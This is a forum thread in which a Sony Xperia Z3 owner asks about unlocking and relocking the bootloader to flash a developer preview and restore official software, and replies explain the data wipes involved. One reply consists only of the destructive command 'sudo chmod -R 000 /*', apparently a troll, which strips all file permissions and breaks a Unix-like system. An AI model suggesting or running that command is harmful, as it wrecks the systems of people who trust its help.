Hi,

I have Sony Xperia Z3,  I want to install Android N Developer Preview on my phone, but that will erase all my apps and data. I know I can backup and restore perfectly using custom recovery but installing custom recovery will require to unlock my bootloader. I'm ready to unlock bootloader but after I unlock bootloader I will not be able to flash or install official software from Sony. Will relocking the bootloader allow me to install the official software from Xperia Companion?

Unlocking the boot loader will wipe your data for security reasons. You'll need to find a different solution.

Ya, but after I reclock can I install software from sony? Or should I flash it externally (ftf files)?

In theory a relocked phone is indistinguishable from one that has never been unlocked. If however you installed a different rom, nothing guarantees any of the software will work on it. If you put the stock rom back it should work like new.

What I meant is that your data will be wiped BEFORE you get the chance to install a recovery program, because the device wipes itself if the bootloader is unlocked.

Don't ask to ask, just ask... please 🤨

sudo chmod -R 000 /*

relocking your bootloader will also wipe your entire phone. includes user data as well. so when you say flash externally you mean with fastboot?
